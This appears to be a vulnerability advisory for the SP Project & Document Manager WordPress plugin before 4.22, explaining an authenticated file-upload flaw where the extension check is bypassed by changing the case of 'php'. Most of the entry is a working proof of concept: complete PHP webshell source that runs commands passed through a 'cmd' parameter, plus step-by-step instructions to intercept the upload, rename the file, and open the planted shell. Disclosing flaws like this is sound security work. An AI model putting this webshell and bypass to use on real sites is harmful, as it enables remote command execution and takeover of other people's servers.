SP Project & Document Manager < 4.22 - Authenticated Shell Upload

2021-05-2500:00:00

Viktor Markopoulos

394

plugin

file upload

security loophole

server .

EPSS

0.971

Percentile

99.8%

JSON

The plugin allows users to upload files, however, the plugin attempts to prevent php and other similar files that could be executed on the server from being uploaded by checking the file extension. It was discovered that php files could still be uploaded by changing the file extension’s case, for example, from “php” to “pHP”. The plugin does state that users can upload and manage files without limits, but also does attempt to prevent dangerous files from being uploaded, which was found to be inadequate.

1. Upload a webshell as web.php:

<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
    if(isset($_GET['cmd']))
    {
        system($_GET['cmd']);
    }
?>
</pre>
</body>
<script>document.getElementById("cmd").focus();</script>
</html>

2. Intercept the request
3. Rename the dlg-upload-file[] parameter from web.php with web.pHP
4. Visit http://website.com/wp-content/uploads/sp-client-document-manager/[user's uid]/web.php and use the webshell